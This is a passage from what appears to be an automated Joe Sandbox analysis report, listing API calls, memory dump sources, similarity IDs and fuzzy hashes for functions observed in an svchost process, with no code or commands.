                                                                                                                                                                                • Instruction Fuzzy Hash: 8151E172A0AB8196E6249F31A44036D73A1FB44BD4F544635EF9C07B85EFBCE292A700
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$CounterPerformanceQuery_strdupcalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3729980476-0
                                                                                                                                                                                • Opcode ID: 38f2c776dd505ea8d74861fe59551fda68d31dff6f8c18ec1922719d8e189ec5
                                                                                                                                                                                • Instruction ID: 99a7016b871c51dd906639237034c48796ccec153ca927bce41f4926ec772b91
                                                                                                                                                                                • Opcode Fuzzy Hash: 38f2c776dd505ea8d74861fe59551fda68d31dff6f8c18ec1922719d8e189ec5
                                                                                                                                                                                • Instruction Fuzzy Hash: 5451816260DBC189E7568F3884403E87BA4E759B68F1C4375CBBC073C6DF28A5A1C725
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsDBCSLeadByteEx.KERNEL32 ref: 682948ED
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32 ref: 6829492D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Byte$CharLeadMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2561704868-0
                                                                                                                                                                                • Opcode ID: ccc6a07d604aef474372a0d5ced22c01b86187b091dacb2da16cd17ea3ba90ae
                                                                                                                                                                                • Instruction ID: aec0926e6471e9e8c25494d34f5ba446f26d8992a27b114b2891c6cd51b67b3f
                                                                                                                                                                                • Opcode Fuzzy Hash: ccc6a07d604aef474372a0d5ced22c01b86187b091dacb2da16cd17ea3ba90ae
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C31B6726186C58AEB318F26F41478A7661F785759F844215EAF857B95CB3DC481CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_time64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3087401894-0
                                                                                                                                                                                • Opcode ID: fc031866714887f2fc28bd4e701da9fb79dc6775f5b44f3fd78b573d9409ab9c
                                                                                                                                                                                • Instruction ID: 46a3bce55a13e690696d9d9c59932de07aee034e94aba70ce5db3a718e3405a9
                                                                                                                                                                                • Opcode Fuzzy Hash: fc031866714887f2fc28bd4e701da9fb79dc6775f5b44f3fd78b573d9409ab9c
                                                                                                                                                                                • Instruction Fuzzy Hash: 24317825A0C68685EA549B6EA80027EB790AB4DFE4F0C0631DF6E477D5DF3CE4938708
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errnofreememcpystrchr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2115676392-0
                                                                                                                                                                                • Opcode ID: b25cb09a970a2c028ca74f7b2598a8a7ac0df78f0ccfd7b7517905ab85391a18
                                                                                                                                                                                • Instruction ID: 611ceaf41bba19ca4a4c16f91e1bf6df6535d01a19af621a9c25f715f280cd08
                                                                                                                                                                                • Opcode Fuzzy Hash: b25cb09a970a2c028ca74f7b2598a8a7ac0df78f0ccfd7b7517905ab85391a18
                                                                                                                                                                                • Instruction Fuzzy Hash: 9611E7A634568988ED095A5BA900799A750A79AFF8FCC0230AF6D47BD4EE7CC4D98300
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$fputwc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 150244592-0
                                                                                                                                                                                • Opcode ID: c2c6b2484b39b49a0fcfee41523438bffa445ebd70cdf74e54fd19da28add474
                                                                                                                                                                                • Instruction ID: 244aee1e114e4195e8fd06e4147dcd36d29585405f5c3d7b400b3649f65df6d3
                                                                                                                                                                                • Opcode Fuzzy Hash: c2c6b2484b39b49a0fcfee41523438bffa445ebd70cdf74e54fd19da28add474
                                                                                                                                                                                • Instruction Fuzzy Hash: 691129D670815D44EE245B2AB9543BA5250AB48BE8FC8423CDE79477E8EF38C5CA8200
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errnofreefwritestrchr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2662193495-0
                                                                                                                                                                                • Opcode ID: 3774e2090c633a3656ab33327e8cec294d0beb47fd11ff2b83d8f3812c8ee8ce
                                                                                                                                                                                • Instruction ID: bc084c77e099cd1f26941faf66af064652f81373628a2ae5a35925b9f4d5070e
                                                                                                                                                                                • Opcode Fuzzy Hash: 3774e2090c633a3656ab33327e8cec294d0beb47fd11ff2b83d8f3812c8ee8ce
                                                                                                                                                                                • Instruction Fuzzy Hash: DE012B96B0825801ED256A5AB9103B986416B49FE4FC843315E3D5B7D5EE28C8868740
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: realloc$EnvironmentVariablefree
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2828309815-0
                                                                                                                                                                                • Opcode ID: 0474e825bf9baf4407b4acae361f25aec87694e3a3739cbb8d91ebbe7bee1f59
                                                                                                                                                                                • Instruction ID: 14a15ee55e5d17e00942b49a7eb8b0c06270e42948fbd3429bcffb9e8c2eca8c
                                                                                                                                                                                • Opcode Fuzzy Hash: 0474e825bf9baf4407b4acae361f25aec87694e3a3739cbb8d91ebbe7bee1f59
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B113021B1DB4686EB648F1A658023EA2A5BB8CBC0F1C4435DF4E43B56DF7DE442874C
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                • Opcode ID: 76dc281f23358ddf6eb99c8714ebcc82b0ada6c38767cee93f7018f55c324b73
                                                                                                                                                                                • Instruction ID: add43dbc9d6707677dbd04bf8435b8b9185e01e3a4df748484a812eece1ec04a
                                                                                                                                                                                • Opcode Fuzzy Hash: 76dc281f23358ddf6eb99c8714ebcc82b0ada6c38767cee93f7018f55c324b73
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D112E26B15F019AEB00CF70E8542B933A4FB59B98F440E35EA6D467A8EF7CD1549350
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 73155330-3916222277
                                                                                                                                                                                • Opcode ID: bab73a2a18158c40128173d4022fe1e4ba3bf8d7770a42fe217610aa479769af
                                                                                                                                                                                • Instruction ID: 5fabc19cb6d29a10194342bc852f3940c9b18e6c6bc1cbe68b874b22e3a796bc
                                                                                                                                                                                • Opcode Fuzzy Hash: bab73a2a18158c40128173d4022fe1e4ba3bf8d7770a42fe217610aa479769af
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D518A72A09B46A6EB158F3AD45426C33A0FB48BD0F544532DB5D43BA4DF7CE1A2D300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                • String ID: U
                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                • Opcode ID: 5395f2ca251e7fd6a1218f45cf21a8a9f9c650a0f407ce39ad44d64f910bb6f8
                                                                                                                                                                                • Instruction ID: b06c0d164efb10ad4f8cb4c1a13c2822cc393605412abcbca344968452123c34
                                                                                                                                                                                • Opcode Fuzzy Hash: 5395f2ca251e7fd6a1218f45cf21a8a9f9c650a0f407ce39ad44d64f910bb6f8
                                                                                                                                                                                • Instruction Fuzzy Hash: 1941D472A1AA819ADB208F25E8047AEA7A4F7887D4F440131EF4D87758EF3CD501CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                • String ID: x590769
                                                                                                                                                                                • API String ID: 2371198981-3178962706
                                                                                                                                                                                • Opcode ID: e23062c7d76d113753e651a634e43f82d3c0509878c527954dbcf8b97543962d
                                                                                                                                                                                • Instruction ID: 2cb866db3c0fe941b1977b27914dd9223df6c2c365d2190275324fdf16fe37bd
                                                                                                                                                                                • Opcode Fuzzy Hash: e23062c7d76d113753e651a634e43f82d3c0509878c527954dbcf8b97543962d
                                                                                                                                                                                • Instruction Fuzzy Hash: 4931AC62A06B4291EE189F35A92037C2290EF54BF4F248731DA7C067D5FE7CE6939300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=
                                                                                                                                                                                • String ID: %02x:$%s%x
                                                                                                                                                                                • API String ID: 356670603-2591467423
                                                                                                                                                                                • Opcode ID: 099c5f9604e0f42144b270ea8a575e9816c08c086fa0cecd28cd7e4d40179286
                                                                                                                                                                                • Instruction ID: 6899dc4f839b81b751f070eb9e126d9f60dd273f3a6f3d8b7428bfd601c041e8
                                                                                                                                                                                • Opcode Fuzzy Hash: 099c5f9604e0f42144b270ea8a575e9816c08c086fa0cecd28cd7e4d40179286
                                                                                                                                                                                • Instruction Fuzzy Hash: CA31E021B0C79785FA21962D95601BA7BA2AF0D7C4F8D4431CF4D46A85EF1CE50BCB48
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressHandleModuleProcgetsockoptsetsockopt
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 1224256098-2726393805
                                                                                                                                                                                • Opcode ID: e7b6d4928bf4774bfac04551d52ac79bdb49a7d93007c6926dc68ce326c843e7
                                                                                                                                                                                • Instruction ID: 362846d9a17b5694e1a1f66b7065e5049f19b88cc21c0f90e17f8353f6bf7c10
                                                                                                                                                                                • Opcode Fuzzy Hash: e7b6d4928bf4774bfac04551d52ac79bdb49a7d93007c6926dc68ce326c843e7
                                                                                                                                                                                • Instruction Fuzzy Hash: B71130B160C64287F7208F58E415776B790EB897C5F980234EB8C46B98DBBDD586CF08
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8A7F8F48E), ref: 00007FF8A7F94340
                                                                                                                                                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8A7F8F48E), ref: 00007FF8A7F94381
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                • Opcode ID: 9ddae76ee3e44c3250864962b981ba338d341b164643467d500117839cd26ea3
                                                                                                                                                                                • Instruction ID: 34994f7b41719e1cc20a6b9caab08857e9b1e06c65c11242b93a38adc74d1324
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ddae76ee3e44c3250864962b981ba338d341b164643467d500117839cd26ea3
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D114932619B4192EB208F35E40026EB7E0FB88BC4F584234EB9C07B58DF3CD651AB40
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$calloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3095843317-0
                                                                                                                                                                                • Opcode ID: 884077ace18fe05f5bcecc7e9f9f6dae5599daebb2d5e3873502e91a9f56e8dc
